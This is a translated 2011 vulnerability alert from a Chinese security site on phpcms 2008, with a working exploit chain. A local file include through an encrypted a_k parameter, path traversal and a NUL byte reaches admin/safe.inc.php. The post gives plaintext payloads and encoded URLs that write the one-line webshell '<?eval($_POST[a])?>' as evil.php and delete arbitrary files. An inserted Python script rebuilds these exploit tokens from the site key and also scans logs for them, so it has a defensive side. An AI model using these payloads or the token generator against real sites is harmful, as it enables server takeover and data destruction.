phpcms local file include leads to a write-shell vulnerability and an arbitrary file deletion vulnerability - Vulnerability Alert - 黑吧安全网 (Heiba Security Net)

2011-04-07T00:00:00
ID MYHACK58:62201130015
Type myhack58
Reporter Anonymous (佚名)
Modified 2011-04-07T00:00:00

Description

by c4rp3nt3r@0x50sec.org. phpcms 2008 SP2 or SP4, I didn't look carefully. I reported a bug a few days ago and the vendor ignored it; call it showing off, fine, I'm in a bad mood. Never mind all that.

A method of getting a shell through the phpcms local file include. This article continues the earlier one on the arbitrary variable overwrite produced by phpcms_auth in phpcms, the local file include vulnerability and the arbitrary file download vulnerability.

With phpcms's local file include class of vulnerability, as long as the entry script has already included /include/common.inc.php, a large number of the admin back-end files can be included and executed.

Because of phpcms's global-variable mechanism there are many ways to get a shell from this; the problem below is not the only one of its kind.

admin/safe.inc.php is the back-end webshell (Trojan) scanner; unfortunately, although the file is named safe, it is anything but.

Here is a local-include method that takes a shell in one shot.

Include admin/safe.inc.php, with the data submitted via GET.

Using the key obtained in the previous article, $key='sIpeofogblFVCildZEwe'; encrypt the following string: $evil='i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChxgNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=

A one-line webshell (一句话木马) evil.php is then written into the phpcms root directory.

Likewise for the arbitrary file deletion vulnerability: $evil='i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00';

http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtBDwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
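To make the "encrypt the string with the key" step concrete, here is an added example (not code from the post, and not phpcms's own code) that rebuilds both a_k values above from the key and the two $evil strings, and then decodes a_k tokens found in web-server log lines to flag the ones that would reach admin/safe.inc.php. The post does not print phpcms_auth() itself; the encoder below, a repeating-key XOR followed by base64, is assumed from the fact that it reproduces both tokens printed above under the key given. The function names, the log lines and the addresses and timestamps in them are constructed for this demonstration.

```python
"""Rebuild and triage phpcms a_k tokens. Added example, not from the post or phpcms."""
import base64
import binascii
import re
from urllib.parse import parse_qs

# Key quoted in the post: $key = 'sIpeofogblFVCildZEwe'
KEY = "sIpeofogblFVCildZEwe"

# The two $evil strings from the post. parse_str() on the server percent-decodes
# the trailing %00 into a real NUL byte, which is what truncates the include path.
EVIL_EDIT_CODE = ("i=1&m=1&f=fuck&action=edit_code&file_path=evil.php"
                  "&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00")
EVIL_DEL_FILE = ("i=1&m=1&f=fuck&action=del_file&files=robots.txt"
                 "&mod=../../admin/safe.inc.php%00")


def _xor(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def phpcms_auth_encode(txt: str, key: str = KEY) -> str:
    """Assumed ENCODE direction of phpcms_auth(): XOR with the repeating key, then base64."""
    return base64.b64encode(_xor(txt.encode("latin-1"), key.encode())).decode()


def phpcms_auth_decode(a_k: str, key: str = KEY) -> str:
    """Inverse of phpcms_auth_encode(); raises binascii.Error on malformed base64."""
    raw = base64.b64decode(a_k, validate=True)
    return _xor(raw, key.encode()).decode("latin-1")


def triage(a_k: str, key: str = KEY) -> dict:
    """Decode one a_k and report what it does once parse_str() has turned it into variables."""
    try:
        plain = phpcms_auth_decode(a_k, key)
    except binascii.Error:
        return {"plain": None, "query": {}, "findings": ["a_k is not valid base64"]}
    # parse_qs percent-decodes values like PHP's parse_str, so %00 arrives as "\x00"
    query = {k: v[0] for k, v in parse_qs(plain, keep_blank_values=True).items()}
    findings = []
    mod = query.get("mod", "")
    if "../" in mod or "..\\" in mod:
        findings.append("mod contains directory traversal: %r" % mod)
    if "\x00" in mod:
        findings.append("mod ends in a NUL byte (include() path truncation on PHP < 5.3.4)")
    if query.get("action") == "edit_code" and "file_path" in query:
        findings.append("edit_code would write PHPCMS_ROOT/%s" % query["file_path"])
    if query.get("action") == "del_file" and "files" in query:
        findings.append("del_file would unlink PHPCMS_ROOT/%s" % query["files"])
    return {"plain": plain, "query": query, "findings": findings}


# Tokens as the post's author would have produced them, plus a harmless one
AK_EDIT_CODE = phpcms_auth_encode(EVIL_EDIT_CODE)
AK_DEL_FILE = phpcms_auth_encode(EVIL_DEL_FILE)
AK_BENIGN = phpcms_auth_encode("i=1&m=1&f=play")

# Constructed web-server log lines for the scan below (not taken from the post)
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Apr/2011:10:01:02 +0800] "GET /n/phpcms/play.php?a_k=%s HTTP/1.1" 200 512' % AK_EDIT_CODE,
    '10.0.0.5 - - [07/Apr/2011:10:01:09 +0800] "GET /n/phpcms/play.php?a_k=%s HTTP/1.1" 200 498' % AK_DEL_FILE,
    '10.0.0.9 - - [07/Apr/2011:10:02:30 +0800] "GET /n/phpcms/play.php?a_k=%s HTTP/1.1" 200 9031' % AK_BENIGN,
    '10.0.0.9 - - [07/Apr/2011:10:02:31 +0800] "GET /n/phpcms/index.php HTTP/1.1" 200 14020',
]

_AK_PARAM = re.compile(r"[?&]a_k=([A-Za-z0-9+/=]+)")


def scan_log(lines, key: str = KEY):
    """Return (token, findings) for every request whose a_k decodes to something dangerous."""
    hits = []
    for line in lines:
        m = _AK_PARAM.search(line)
        if not m:
            continue
        result = triage(m.group(1), key)
        if result["findings"]:
            hits.append((m.group(1), result["findings"]))
    return hits


if __name__ == "__main__":
    print("a_k (edit_code):", AK_EDIT_CODE)
    print("a_k (del_file): ", AK_DEL_FILE)
    for token, findings in scan_log(SAMPLE_LOG):
        print(token[:24] + "...", findings)
```

Decoding requires the site's auth key, so the scan is something a site owner or responder can run over their own logs after an incident, not a generic signature; a real log will often carry a_k percent-encoded ("+", "/" and "=" as %2B, %2F, %3D), which has to be undone before the token is handed to triage(). The NUL-byte caveat matters in both directions: on PHP 5.3.4 and later include() refuses paths containing a NUL, so the %00 trick in mod stops working there, while the edit_code and del_file sinks themselves remain reachable by any other route that gets admin/safe.inc.php included.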

The vulnerable code:

//admin/safe.inc.php
<?php
defined('IN_PHPCMS') or exit('Access Denied');
// the constant is declared in include/common.inc.php: define('IN_PHPCMS', TRUE);

if(empty($action)) $action = "start";
$safe = cache_read('safe.php');
$file = load('filecheck.class.php');
if(empty($safe))
{
    $safe = array
    (
        'file_type' => 'php|js',
        'code' => '',
        'func' => 'com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress',
        'dir' => $file->checked_dirs()
    );
}
switch ($action)
{
    ...
    case 'edit_code':
        if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code)))
        {
            showmessage('modify success!');
        }
        break;

    case 'del_file':
        $file_path = urldecode($files);
        if (empty($file_path))
        {
            showmessage('please select File');
        }
        $file_list = cache_read('scan_backdoor.php');
        unset($file_list[$file_path]);
        cache_write('scan_backdoor.php', $file_list);
        @unlink(PHPCMS_ROOT.$file_path);
        showmessage('file deleted successfully!', '?mod=phpcms&file=safe&action=scan_table');
        break;
    ...

Once the decoded a_k has been turned into variables, $action, $file_path, $files and $code are all attacker-controlled, and the two sinks concatenate them onto PHPCMS_ROOT with no path check of any kind: edit_code writes attacker-chosen content to an attacker-chosen path under (or, with ../, outside) the phpcms root, and del_file unlinks whatever path is named. The IN_PHPCMS check at the top is the only guard, and it is satisfied because the entry script has already included include/common.inc.php.